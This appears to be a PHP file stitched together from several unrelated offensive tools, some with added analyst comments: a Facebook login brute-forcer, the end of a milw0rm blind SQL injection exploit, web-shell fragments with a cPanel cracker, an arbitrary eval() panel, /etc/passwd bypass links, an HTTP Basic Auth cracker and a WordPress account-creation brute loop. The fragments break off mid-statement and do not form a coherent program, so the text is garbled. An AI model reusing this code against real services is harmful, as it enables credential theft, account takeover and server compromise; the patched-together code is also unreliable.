<?php
/**
 * Submits one email/password pair to a hard-coded mobile login URL with cURL
 * and prints an HTML result line for that pair.
 *
 * The response body is searched for the marker `class="s t i u"`: when the
 * marker is present the pair is printed as "No", otherwise as "yes". A response
 * without the marker for any other reason (including a failed transfer, where
 * curl_exec() returns false) is therefore also printed as "yes", so "yes" lines
 * in captured output are not proof that a credential was valid.
 *
 * Analyst notes:
 *  - eregi() was removed in PHP 7.0, which dates this sample to PHP 5.x hosts.
 *  - The cURL handle is never closed and the function returns nothing.
 *  - $user and $pass are echoed into HTML unescaped.
 *
 * @param string $user Value sent as the `email` form field.
 * @param string $pass Value sent as the `pass` form field.
 * @return void
 */
function brute($user, $pass) {
    $ch = curl_init();
    // Hard-coded target endpoint; nothing in this function makes it configurable.
    curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login.php?login_attempt=1");
    curl_setopt($ch, CURLOPT_HEADER, 0);
    // Peer certificate verification is disabled, so the response is not authenticated.
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
    // Passing a string body makes cURL issue a POST; both values are interpolated as-is.
    curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}");
    // Fixed, abbreviated User-Agent: a stable indicator for log-based detection.
    curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
    $login = curl_exec($ch);
    // Case-insensitive search for the marker; its presence is treated as a rejected login.
    $check = eregi('class="s t i u"', $login) ? true : false;
    if ($check == true) {
        echo "No || Username : <font color='red'>{$user}</font> Password : <font color='red'>{$pass}</font></font></p>";
    } else {
        echo "yes || Username: <font color='green'>{$user}</font> Password : <font color='green'>{$pass}</font></font></p>";
    }
}
// Driver: both POST fields are split on newlines and every username is paired
// with every password, one outbound request per pair. From the hosting side this
// shows up as a burst of login POSTs from the web server carrying the fixed
// User-Agent set above.
$username = explode("\n", $_POST['username']);
$password = explode("\n", $_POST['password']);
foreach ($username as $users) {
    $users = @trim($users);
    foreach ($password as $pass) {
        $pass = @trim($pass);
        // brute() has no return value, so this echo adds nothing beyond what brute() prints itself.
        echo brute($users, $pass);
    }
}
// NOTE(review): this brace closes an `if` whose opening lies outside this excerpt;
// its `else` branch only redirects the client.
} else {
    header("location:../croak");
}
$chr = 0; while ($chr < strlen($key)) { if (check($host, $path, $fld, $pos, $key[$chr])) { $res .= $key[$chr]; $chr = -1; $pos++; } $chr++; } return $res; } function usage() { echo "[+] Lito Lite Blind SQL Injection Exploit\n" . "[+] Author: darkjoker ~ http://darkjokerside.altervista.org ~ darkjoker93[at]gmail[dot]com\n" . "[+] Usage: php " . $argv[0] . " <hostname> <path> [key]\n" . "[+] Ex. php " . $argv[0] . " localhost /lito_lite abcdefghijklmnopqrstuvwxyz0123456789\n" . "[+] Greetz to athos, marco6\n"; exit; } if (count($argv) < 3) { usage(); } $host = $argv[1]; $path = $argv[2]; if (empty($argv[3])) { $key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; } else { $key = $argv[3]; } echo "[+] Username: "******"username", $key) . "\n" . "[+] Password: "******"password", $key) . "\n"; ?> # milw0rm.com [2009-01-03]
} } } if ($cracktype == "cpanel" || $cracktype == "cpanel2") { if ($cracktype == "cpanel2") { $cpanel_port = "23"; } else { $cpanel_port = "2082"; } foreach ($userlist as $user) { $pureuser = trim($user); print "<b><font face=\"Comic Sans MS\" style=\"font-size: 11pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#FF0800\">\r\n Please put some good password to crack user {$pureuser} :( ... </font></b>"; if ($_POST['bruteforce'] == "true") { echo " bruteforcing .."; echo "<br>"; brute(); } else { echo "<br>"; foreach ($passlist as $password) { $purepass = trim($password); cpanel_check($target, $pureuser, $purepass, $connect_timeout); } } } $time_end = getmicrotime(); $time = $time_end - $time_start; print "<b><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#008000\">[~]#</font><font face=\"Comic Sans MS\" style=\"font-size: 9pt\" color=\"#FF0000\">\r\n Cracking Finished. Elapsed time: {$time}</font> seconds</b><br><br>"; } } ?>
echo "<option value=\"lib:lib\">lib:lib</option>"; } echo "</select></td></tr>"; echo "<tr><td alling=\"center\"><b>Use: </b><SELECT name=\"box\">"; echo "<OPTION value=\"mysql\">mysql</option>\n <option value=\"ftp\">ftp</option>"; // if(function_exists(ssh2_connect)){ // echo "<option value=\"ssh\">ssh</option>"; // } echo "</select></td>"; echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Brute\" name=\"b_brute\"></td></tr><tr><td alling=\"center\"><b>Host: </b><input type=\"text\" name=\"brute_host\" value=\"" . $host . "\">(for lib:lib)</td></tr>"; if (function_exists(fopen)) { echo "<td alling=\"center\"><b>From lib (if set): <input type=\"text\" name=\"lib\" value=\"" . $lib . "\">"; } echo "</table></form>"; if ($_POST['b_brute']) { brute($_POST['box'], $_POST['box1'], $_POST['brute_host'], $_POST['lib']); } } #################### Eval ###################################################### if ($r_act == "eval") { if ($_POST['b_eval']) { $eval = str_replace("<?", "", $_POST['php_eval']); $eval = str_replace("?>", "", $eval); eval($eval); } echo "<form action=\"" . $HTTP_REFERER . "\" method=\"POST\" enctype=\"multipart/form-data\">"; echo "<input type=\"hidden\" value='" . $r_act . "' name=\"r_act\">"; echo "<table BORDER=1 align=center>"; echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font face=Verdana size=2>Eval php: </b></td></tr><font size=-2>"; echo "<tr><td alling=\"center\"><textarea name=\"php_eval\" cols=90 rows=15></textarea></td></tr><tr><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Eval\" name=\"b_eval\"></td></tr>"; echo "</tr></table></form>";
/**
 * Web-shell panel "HTTP Auth cracker": with no `target` in the request it renders
 * the input form; with a `target` it tries HTTP Basic credentials against that host.
 *
 * Everything is driven by $_REQUEST (target, method, mode, combo, user, dictionary,
 * loG, logfilE, min, max). No access check is visible inside this function.
 *
 * Two modes:
 *  - mode "wl": reads candidates from the file named by `dictionary` and sends one
 *    raw HTTP/1.0 request per candidate over a new socket to port 80.
 *  - any other mode: builds PHP source text in $code and hands it to brute(), whose
 *    four-argument form is not defined in this excerpt.
 *
 * Review notes for defenders:
 *  - `dictionary` is passed to fopen() verbatim, so the request chooses which file is read.
 *  - `logfilE` is passed verbatim to file_add_contentS() (defined elsewhere; presumably
 *    appends to that path, confirm), so the request also chooses the file written.
 *  - Request values and getenv('HTTP_HOST') are echoed into HTML unescaped.
 *  - Traffic fingerprint for log review: HTTP/1.0 request line, `Accept-Encoding: text`,
 *    `Referer` equal to the bare host name, one TCP connection per candidate, and
 *    long runs of 401 responses; lockout or rate limiting on repeated 401s limits this.
 *
 * @return void Output is echoed directly.
 */
function authcrackeR() {
    global $hcwd;
    if (!empty($_REQUEST['target'])) {
        // Logging is enabled only when both the checkbox and a log path are supplied.
        if (isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE'])) {
            $log = 1;
            $file = $_REQUEST['logfilE'];
        } else {
            $log = 0;
        }
        $data = '';
        $method = $_REQUEST['method'] ? 'POST' : 'GET';
        // Split the query string off the target; it is reused later as request data.
        if (strstr($_REQUEST['target'], '?')) {
            $data = substr($_REQUEST['target'], strpos($_REQUEST['target'], '?') + 1);
            $_REQUEST['target'] = substr($_REQUEST['target'], 0, strpos($_REQUEST['target'], '?'));
        }
        $u = parse_url($_REQUEST['target']);
        $host = $u['host'];
        $page = $u['path'];
        $type = $_REQUEST['combo'];
        $user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : '';
        if ($method == 'GET') {
            $page .= $data;
        }
        echo '<font color=#FA0>';
        if ($_REQUEST['mode'] == 'wl') {
            // Wordlist mode: the path comes straight from the request.
            $dictionary = fopen($_REQUEST['dictionary'], 'r');
            while (!feof($dictionary)) {
                if ($type) {
                    // Combo format: each line is split at the first ':' into user and password.
                    $combo = trim(fgets($dictionary), " \n\r");
                    $user = substr($combo, 0, strpos($combo, ':'));
                    $pass = substr($combo, strpos($combo, ':') + 1);
                } else {
                    $pass = trim(fgets($dictionary), " \n\r");
                }
                // One new plain-text connection to port 80 per candidate, 5 second timeout;
                // connection warnings are suppressed with @.
                $so = @fsockopen($host, 80, $en, $es, 5);
                if (!$so) {
                    echo "Can not connect to host";
                    break;
                } else {
                    $packet = "{$method} {$page} HTTP/1.0\r\nAccept-Encoding: text\r\nHost: {$host}\r\nReferer: {$host}\r\nConnection: Close\r\nAuthorization: Basic " . base64_encode("{$user}:{$pass}");
                    if ($method == 'POST') {
                        $packet .= 'Content-Type: application/x-www-form-urlencoded\\r\\nContent-Length: ' . strlen($data);
                    }
                    $packet .= "\r\n\r\n";
                    $packet .= $data;
                    fputs($so, $packet);
                    // Characters 9-10 of the status line are the first two digits of the
                    // status code; "20" (any 20x reply) is treated as accepted credentials.
                    $res = substr(fgets($so), 9, 2);
                    fclose($so);
                    if ($res == '20') {
                        echo "U: {$user} P: {$pass}</br>";
                        if ($log) {
                            file_add_contentS($file, "U: {$user} P: {$pass}\r\n");
                        }
                    }
                }
            }
        } else {
            // Generated-code mode: $host, $page, $user and $data from the request are
            // concatenated unescaped into PHP source text. NOTE(review): brute() is not
            // shown here; if it evaluates $code, request input reaches the evaluator.
            $code = ' $so = @fsockopen ( "' . $host . '", 80, $en, $es, 5 ); $packet = "' . $method . " {$page} " . 'HTTP/1.0\\r\\nAccept-Encoding: text\\r\\nHost: ' . $host . '\\r\\nReferer: ' . $host . '\\r\\nConnection: Close\\r\\nAuthorization: Basic " . base64_encode ( "' . $user .
                ':".$word )."\\r\\n"';
            if ($method == "POST") {
                $code .= ".'Content-Type: application/x-www-form-urlencoded\r\nContent-Length: " . strlen("'{$data}'") . "'";
            }
            $code .= "\r\n\r\n" . $data . ';fputs ( $so, $packet ); $test= ( substr ( fgets ( $so ), 9, 2 ) == "20");';
            // The generated source is written to the response before it is used.
            echo $code;
            if ($res = brute($_REQUEST['mode'], $_REQUEST['min'], $_REQUEST['max'], $code) != null) {
                echo "<b>{$user}:{$res}</b><br />";
            }
        }
        echo 'Done!</font>';
    } else {
        // No target supplied: render the form. The default target is built from
        // getenv('HTTP_HOST'); the default log path from whereistmP() (defined elsewhere,
        // presumably a temp directory, confirm). $hcwd is a global inserted as-is.
        echo ' <form name=cracker method="POST"> <div class="fieldwrapper"> <label class="styled" style="width:320px">HTTP Auth cracker</label> </div><div class="fieldwrapper"> <label class="styled">Target:</label> <div class="thefield"> <input type="url" name="target" value="http://' . getenv('HTTP_HOST') . '/admin/" size="30" /> </div> </div> <div class="fieldwrapper"><label class="styled">Input:</label><div class="thefield"> <select name="mode" id="mode" onChange="toggle()"> <option value="09">Bruteforce [0-9]</option> <option value="az">Bruteforce [a-z]</option> <option value="az09">Bruteforce [a-z] [0-9]</option> <option value="az09AZ">Bruteforce [a-z] [A-Z] [0-9]</option> <option value="all">Bruteforce [ALL]</option> <option value="wl">Wordlist</option> </select> </div></div> <div class="fieldwrapper" id="dic"> <label class="styled">Dictionary:</label> <div class="thefield"> <input type="text" name="dictionary" size="30" /> </div> </div><div class="fieldwrapper" id="fcr"> <label class="styled">Dictionary type:</label> <div class="thefield"> <ul style="margin-top:0;"> <li><input type="radio" value="0" checked name="combo" onClick="document.cracker.user.disabled = false;" /> <label>Simple (P)</label></li> <li><input type="radio" name="combo" value="1" onClick="document.cracker.user.disabled = true;" /> <label>Combo (U:P)</label></li> </ul> </div> </div> <div class="fieldwrapper"> <label class="styled">Method:</label> <div class="thefield"> <select name="method"><option selected value="1">POST</option><option 
value="0">GET</option></select> </div> </div><div class="fieldwrapper"> <label class="styled">Username:</label> <div class="thefield"> <input type="text" name="user" size="30" /> </div> </div><div class="fieldwrapper"> <label class="styled"><input type=checkbox name=loG value=1 onClick="document.cracker.logfilE.disabled = !document.cracker.logfilE.disabled;" checked> Log:</label> <div class="thefield"> <input type=text name=logfilE size=25 value="' . whereistmP() . DIRECTORY_SEPARATOR . '.log"> </div> </div> ' . $hcwd . ' <div class="buttonsdiv"> <input type="submit" name="start" value="Start" style="margin-left: 150px;" /> </div> </form><script>toggle();</script>';
    }
}
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/35.0.1916.114"); curl_setopt($ch, CURLOPT_POSTFIELDS, "user={$user_login}&passi={$pass1}&passii={$pass2}&_wpnonce_create=code=&redirect_to=.{$victim}./author/{$user_login}"); $check = curl_exec($ch); if (eregi('$user_login', $check)) { echo "<p><font face='Verdana' size='1'>[+] Username Has Been Successfully Added : <font color='#008000'>{$user_login} = {$victim}</font></p>"; } else { echo "<font face='Tahoma' size='2' color='red'> => Incorrect Code Trying More...</font><br>"; } } foreach ($user_login as $user) { foreach ($pass1 as $passi) { foreach ($pass2 as $passii) { brute($code); } } } curl_close($ch); } } } } if (isset($_GET['action']) && $_GET['action'] == 'rootshelleexecbpass') { echo '<center><b class="conte"> <a href="?action=grasy">Bypass /etc/passwd</a> - <a href="?action=nemcon">Bypass Users Server</a> - <a href="?action=cgipl">Bypass Perl Security</a> - <a href="?action=bypsrootwzp">Bypass With Zip File</a> - <a href="?action=bforb">Bypass system function</a> -
} else { $ARG = array(); foreach ($argv as $arg) { if (strpos($arg, '-') === 0) { $key = substr($arg, 1, 1); if (!isset($ARG[$key])) { $ARG[$key] = substr($arg, 3, strlen($arg)); } } } if ($ARG[s] && $ARG[u]) { $server = $ARG[s]; $User_id = intval($ARG[u]); $User_id--; print "[+] Phase 1 brute login.\n"; $login = brute($User_id, "Login"); print "\n[+] Phase 1 successfully finished: {$login}\n"; print "[+] Phase 2 brute password-hash.\n"; $hash = brute($User_id, "Password"); print "\n[+] Phase 2 successfully finished: {$hash}\n"; successfully($login, $hash); } else { help_argc($argv[0]); exit(0); } } ?> # milw0rm.com [2008-12-23]